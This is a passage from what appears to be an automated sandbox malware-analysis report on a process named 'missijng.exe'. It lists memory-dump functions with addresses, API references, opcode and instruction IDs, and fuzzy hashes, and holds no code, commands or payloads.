                                                                                    • Opcode Fuzzy Hash: 4ee35d631616f3368cba9c309a10cb621a912fe59c4d97b9003627d69f29b5dc
                                                                                    • Instruction Fuzzy Hash: 7E519FB49112098FDB44EFB9E845A9DBBF7AF85308F00C93AD1059B324EB705946DB41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002F3798, Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: p!H
                                                                                    • API String ID: 0-1596484867
                                                                                    • Opcode ID: 73eb00d0ec195fd53920807ee801bef526c965c3cdf8ce83aeb93725fd778b42
                                                                                    • Instruction ID: a815fddac96e8672b0df2da212afe528f674ce8278e973e50eb0e003978f65f9
                                                                                    • Opcode Fuzzy Hash: 73eb00d0ec195fd53920807ee801bef526c965c3cdf8ce83aeb93725fd778b42
                                                                                    • Instruction Fuzzy Hash: 8D51AEB490120D8FDB44EFB9E845A9EBBF7AF85308F00C93AD1059B324EB705946DB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002F601C, Relevance: .2, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bcf2dafdfcee397e9dac05f6962af98eb108b8a61b336970075858e6a36d032
                                                                                    • Instruction ID: a3c821eeca23b364fcf14bdab85dc86c8d14c6e6b0337c155a8dd7fc53d8a083
                                                                                    • Opcode Fuzzy Hash: 0bcf2dafdfcee397e9dac05f6962af98eb108b8a61b336970075858e6a36d032
                                                                                    • Instruction Fuzzy Hash: 61B18EB0E11528CBDB64DFA9DA84BDCBBF5FB88304F1481E5D248B7205D7309A968F58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FCBC0, Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 420738cf6e5dfd7b2794487957b23886b1a774031114354d512637d3b26a1e0b
                                                                                    • Instruction ID: 9412a21b28b6df7ae30fb203fa0bad8bad523354963176bbaac5c3895adc9f19
                                                                                    • Opcode Fuzzy Hash: 420738cf6e5dfd7b2794487957b23886b1a774031114354d512637d3b26a1e0b
                                                                                    • Instruction Fuzzy Hash: 21115A30D1421C8BDB148FAAC5587FEFAF1AF4A340F24946AD515B3290C7784984DF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FCBB8, Relevance: .1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d77cfa1e734c54ab4ca5c448178a7eb05ba178654481daa96c050bd174ac4c10
                                                                                    • Instruction ID: a87e000572de88e9bc7a8e5b09b394b22783fd4978600305eab1abcce1ceeb2e
                                                                                    • Opcode Fuzzy Hash: d77cfa1e734c54ab4ca5c448178a7eb05ba178654481daa96c050bd174ac4c10
                                                                                    • Instruction Fuzzy Hash: 9E119A30C1425C8FDB149FA5C5587FDFAF0AB4A340F24906AD115B3291C7784988DB68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D26F5D, Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2148064147.0000000000D22000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true
                                                                                    • Associated: 00000004.00000002.2148061299.0000000000D20000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000004.00000002.2148130753.0000000000DE8000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c5bf5b29a89903adac641d49cc12628268eb000587602f742c12eea7a003c2ce
                                                                                    • Instruction ID: fbb73f237948d81979615dd7ac28412090838652c1258402136d860ed538bf1d
                                                                                    • Opcode Fuzzy Hash: c5bf5b29a89903adac641d49cc12628268eb000587602f742c12eea7a003c2ce
                                                                                    • Instruction Fuzzy Hash: DAD0C92108FAC2AFDB434B70AB315E17FB97E5321030C08C2D4C18E2A3E066068ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: missijng.exe PID: 3024 Parent PID: 2932 missijng.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 001E94A0, Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: f2127411e1c1985bbcfa80a4a53e1aec77a6f3ad95c50ca0132f3a7fb0e80de8
                                                                                    • Instruction ID: 11fff9ceb3354b867070babd40a2fa6318f6a5619b6a937c105b57ea8dfc21e0
                                                                                    • Opcode Fuzzy Hash: f2127411e1c1985bbcfa80a4a53e1aec77a6f3ad95c50ca0132f3a7fb0e80de8
                                                                                    • Instruction Fuzzy Hash: A91204B4A04228CFCB69EF71D85879DB7BABF88305F1085E9D50AA7251DB319E81CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E94C1, Relevance: 1.8, APIs: 1, Instructions: 344COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 004a92a7c5421a1390126680761c15d700c8e487b4a60318e5448bd61837b6bf
                                                                                    • Instruction ID: f1af0f4a0afb042aa343d5a07fc307ea25c8647563a932e9354720d06fca3da8
                                                                                    • Opcode Fuzzy Hash: 004a92a7c5421a1390126680761c15d700c8e487b4a60318e5448bd61837b6bf
                                                                                    • Instruction Fuzzy Hash: C0F1F374A04228CFCB69EF70D84879DB7BABF89305F2085E9D50AA7251DB319E85CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9506, Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: a902c09a6a7f1f83a4020df395fefd31e713222d00ca4e0e292bc8c31c0b686b
                                                                                    • Instruction ID: c2ee6dfd01e5b27f75f786b6900e0fe1501de37a586cba50fc2aefa0259095c5
                                                                                    • Opcode Fuzzy Hash: a902c09a6a7f1f83a4020df395fefd31e713222d00ca4e0e292bc8c31c0b686b
                                                                                    • Instruction Fuzzy Hash: 9BF1F374A04228CFCB69EF70D84879DB7BABF88305F1085E9E50AA7251DB319E85CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E954B, Relevance: 1.8, APIs: 1, Instructions: 330COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 8727e04d4c203f7c750217e21292505f2e01753cf432031400c7cb6879c90cc8
                                                                                    • Instruction ID: 9efb067c21a25b2aaa6171c23adea874c45269b7889d141378cf471f28ebe39b
                                                                                    • Opcode Fuzzy Hash: 8727e04d4c203f7c750217e21292505f2e01753cf432031400c7cb6879c90cc8
                                                                                    • Instruction Fuzzy Hash: 3BF1F574A04228CFCB69EF70D85879DB7BABF88305F1085E9D50AA7251DB319E85CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9590, Relevance: 1.8, APIs: 1, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 62640f802ad0c7c9248bc4846b6f04b583446e849dfadb64853c34c862b5f61a
                                                                                    • Instruction ID: d0faa66c1fce14b07e2a6c2104def351ea233066e4e485cd969ef45e4d178c05
                                                                                    • Opcode Fuzzy Hash: 62640f802ad0c7c9248bc4846b6f04b583446e849dfadb64853c34c862b5f61a
                                                                                    • Instruction Fuzzy Hash: F3E1F474A04228CFCB69EF70D85879DB7BABF88305F1085E9E50AA7251DB319E85CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E95D5, Relevance: 1.8, APIs: 1, Instructions: 316COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: e7f75e6ab4947b60821d360885dec87f59487f923503c113b9a92dbe8aa36d79
                                                                                    • Instruction ID: e56da2bd1d208d564658b063bd3cc8ab6b3c79a9aea78da528fc1e926479ed81
                                                                                    • Opcode Fuzzy Hash: e7f75e6ab4947b60821d360885dec87f59487f923503c113b9a92dbe8aa36d79
                                                                                    • Instruction Fuzzy Hash: 43E1F474A04228CFCB69EF70D85879DB7BABF88305F1085E9E50AA7251DB319E85CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9A2C, Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 5595b00bb2384881dda8d0301e7d2f6d7ca0c47d528dbf97a3c5e69e27f74e59
                                                                                    • Instruction ID: 23e5434d76dbe22a9458363c1828e42173a1cd1d25e5a4bfd2cf318549dc6ef7
                                                                                    • Opcode Fuzzy Hash: 5595b00bb2384881dda8d0301e7d2f6d7ca0c47d528dbf97a3c5e69e27f74e59
                                                                                    • Instruction Fuzzy Hash: 5E819274905228CFCB69DF60C94979CB7BABF89305F2149E9D50DA7211CB326E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9A71, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 5efe1ef21cb61ee55d35b73bffe72920c858339cb420123b06e359b9486972fa
                                                                                    • Instruction ID: 20321feba7a61cbe98958b3ca9b9868f422338fc94c53d9b636240eaf572dcbd
                                                                                    • Opcode Fuzzy Hash: 5efe1ef21cb61ee55d35b73bffe72920c858339cb420123b06e359b9486972fa
                                                                                    • Instruction Fuzzy Hash: 2471A374904228CFCB69DF60C94579CB7BABF89305F2148E9D509A7211CB326E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9AB6, Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 8f7f06da68630347bae05ba54f4777abe6e1a486af9508e296d07f4a4e1ecba8
                                                                                    • Instruction ID: dab220e8013093b42a5a4e2207b81031b2a3dea626e7ca844f4a983f6e6d73b8
                                                                                    • Opcode Fuzzy Hash: 8f7f06da68630347bae05ba54f4777abe6e1a486af9508e296d07f4a4e1ecba8
                                                                                    • Instruction Fuzzy Hash: DD71A374904228CFCB69DF60C94979CB7BABF89305F2149E9D509A7311CB326E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9AFB, Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: b47332ecf5b14293f26900862ad8c27d56f7b4f33d528a6f31cfbd37fd8b6723
                                                                                    • Instruction ID: 58875a3e2f928da135a429180dc192f1511b261836fc85a100e5c3380f7eb052
                                                                                    • Opcode Fuzzy Hash: b47332ecf5b14293f26900862ad8c27d56f7b4f33d528a6f31cfbd37fd8b6723
                                                                                    • Instruction Fuzzy Hash: 71619274904228CFCB69DF60C94979DB7BABF89305F2148E9D509A7351CB326E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9B40, Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 4e819c680c6db9b26d513f544b501926c26a1dc0db880fa963921b7f866c0868
                                                                                    • Instruction ID: db66c8250c16f8f53c315e83865825978b67c4a2704c0cb4b510bb9a6ad57dc9
                                                                                    • Opcode Fuzzy Hash: 4e819c680c6db9b26d513f544b501926c26a1dc0db880fa963921b7f866c0868
                                                                                    • Instruction Fuzzy Hash: 4D51A274904228CFCB69DF60C94979DB7BABF89305F2148E9D509A7351CB326E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9B85, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: aa4a9caa93e90a2afe1de1cac24d6bff4cc235761ec678ecc816972c08f3c7a0
                                                                                    • Instruction ID: b6637bd188a4c15653d9cf65682a9f43e359702eba5eeef2216d6aae6a734260
                                                                                    • Opcode Fuzzy Hash: aa4a9caa93e90a2afe1de1cac24d6bff4cc235761ec678ecc816972c08f3c7a0
                                                                                    • Instruction Fuzzy Hash: CA51B374905228CFCB69DF60C94479DB7BABF85305F2188E9D509A7311CB316E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9BCA, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001E9BEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 298981faafb8e8b96b13e796be2e2ffcd31258d5c69b24a2aec15f5b1b09eb5f
                                                                                    • Instruction ID: 41e11ba51f557afd604f78d6d76bd0437374d5f6eb4ba38a4e996fc5ab740ae1
                                                                                    • Opcode Fuzzy Hash: 298981faafb8e8b96b13e796be2e2ffcd31258d5c69b24a2aec15f5b1b09eb5f
                                                                                    • Instruction Fuzzy Hash: D651B174904268CFCB69DF60C94879DB7BABF89305F2148E9D509A7211CB326E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009674B8, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00967571
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404700160.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: c3f446238dffc315d6ac884fd04471652445ac5eb629d0fc6efd934fbbada623
                                                                                    • Instruction ID: cc565fed555b2613f0874efb966848a735d04a70826c060a6a78b102bd6d95dd
                                                                                    • Opcode Fuzzy Hash: c3f446238dffc315d6ac884fd04471652445ac5eb629d0fc6efd934fbbada623
                                                                                    • Instruction Fuzzy Hash: 7431EEB1D042589FCB20CFDAC884A9EFBF5AF48714F24846AE819AB310D7709905CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9FBE, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001EA14D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 01ee311d20bafd9754afc3847206068c5817e9ed536df4c25cd14570ad985550
                                                                                    • Instruction ID: 51fcd9045b5c0251efea2c0ccfcfd5426c4cc5b2309ebf5b49f490c2e1f72c69
                                                                                    • Opcode Fuzzy Hash: 01ee311d20bafd9754afc3847206068c5817e9ed536df4c25cd14570ad985550
                                                                                    • Instruction Fuzzy Hash: CB21D074901228CFDB29DFA0D949B9CB7BABF49345F1048EAD50AE6351CB316E85DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001E9FBC, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001EA14D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 20d2a1d979c0adcf8fc70b18fbfb11e67f4ee5d5625b24272654c5c0b1ed4fe6
                                                                                    • Instruction ID: ac978a1dbf8740e0710a1d8aa30dd8fa42c9451e838d967e70de5eba469f76cb
                                                                                    • Opcode Fuzzy Hash: 20d2a1d979c0adcf8fc70b18fbfb11e67f4ee5d5625b24272654c5c0b1ed4fe6
                                                                                    • Instruction Fuzzy Hash: 8A110374901228CFDB2A9F60D948B9CB7BABF49345F2144DAD50AE6351CB316E85DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001EA006, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001EA14D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: ee84ff9f4b45113243c4cba181b9bbe2fc1423e9f2f878e367ca8e86b3d5d936
                                                                                    • Instruction ID: 54f071f4c8f9867600a45373d561085f28e8a53a0327b88a61a7a3e235e06610
                                                                                    • Opcode Fuzzy Hash: ee84ff9f4b45113243c4cba181b9bbe2fc1423e9f2f878e367ca8e86b3d5d936
                                                                                    • Instruction Fuzzy Hash: 8C11C274941228CFCB699F60D94979CB7BABF49345F2084DAD50AE6210CB316E86DF02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001EA04E, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001EA14D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 99e68e7eede2083310b41a48a90788ccc28a2f19ed73cd329c0e6fd28110d1e5
                                                                                    • Instruction ID: 6e7cdadf416b40250f691ae0d5ceea53d54e4274e6b2e73d0bcc09805baba22d
                                                                                    • Opcode Fuzzy Hash: 99e68e7eede2083310b41a48a90788ccc28a2f19ed73cd329c0e6fd28110d1e5
                                                                                    • Instruction Fuzzy Hash: BC01AE74900228CFCB699F60D98979CB7BABF49245F1148EAD40AA6210CB316E86DF42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001EA096, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001EA14D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 00ba2577d1eb43efd8d70020c9903fdbe553aa44edd365171ab47f4f1b817987
                                                                                    • Instruction ID: 2f9fb6339df750355361ba83f591eef2579a275afd5f4c22dfc41f9ed044b734
                                                                                    • Opcode Fuzzy Hash: 00ba2577d1eb43efd8d70020c9903fdbe553aa44edd365171ab47f4f1b817987
                                                                                    • Instruction Fuzzy Hash: 9DF09274904228CFCB25AF64E94979CB7B6BF58341F1044DAD40EA6210CB716E85DF52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001EA0DE, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001EA14D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: f29eda4a46164a9ea18056664a8322997c38ebf1ecc48e4966d59de2ac06c67e
                                                                                    • Instruction ID: 1be9a3143f9f092493199c2dff603ed63ef3366f847d7b8dce8e6e2f2c8b634a
                                                                                    • Opcode Fuzzy Hash: f29eda4a46164a9ea18056664a8322997c38ebf1ecc48e4966d59de2ac06c67e
                                                                                    • Instruction Fuzzy Hash: 5DE0C274C00228CFCB259F64D98978CB7B5BF18341F1008DAD40AA6200CBB06A81DF42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001EA126, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 001EA14D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404435847.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 236323fdac456abec1a7113e8df3da4961e9d117eda753871935e6dcff01a188
                                                                                    • Instruction ID: 2a1c6686ae2da4ff3e99eadb8a2e70e7392f3f85055e65c60e40ed9b5033dfdf
                                                                                    • Opcode Fuzzy Hash: 236323fdac456abec1a7113e8df3da4961e9d117eda753871935e6dcff01a188
                                                                                    • Instruction Fuzzy Hash: 25D092B4C013288FCB60AFA4E84968CB7B5AF08251F2085D6E41DA6211DB302A84DF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0012D48C, Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404365106.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c3f7fac265b0831911771f997b3210a4f67312f9b2ac64996166288d242fb586
                                                                                    • Instruction ID: ac24f49c00326a402abe4b32f9f5cc2c87341f5b1c10fc0860d7eda641ab7516
                                                                                    • Opcode Fuzzy Hash: c3f7fac265b0831911771f997b3210a4f67312f9b2ac64996166288d242fb586
                                                                                    • Instruction Fuzzy Hash: 11213775600244DFCB05DF10F9C0B26BFB6FB98328F24C569E8050B246C376E866CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0012D578, Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404365106.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 132a0a12eb1df3790efda76f2a69e05aa0c0af02317c167e37e14536fc01e4f3
                                                                                    • Instruction ID: 0929ac2b5fe68f444bb83bd108d09041e00bec9e9c4482d185ce42a063ab47e8
                                                                                    • Opcode Fuzzy Hash: 132a0a12eb1df3790efda76f2a69e05aa0c0af02317c167e37e14536fc01e4f3
                                                                                    • Instruction Fuzzy Hash: 66213475204244DFDB15CF50F9C4B2ABFA5FB98318F3485A9E8090B246C336E866CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0013D01C, Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404380911.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
                                                                                    • Instruction ID: 849c282c8d2675e6d3403bf423ad6d707d402cfc61910d265b18eed8a96a33a4
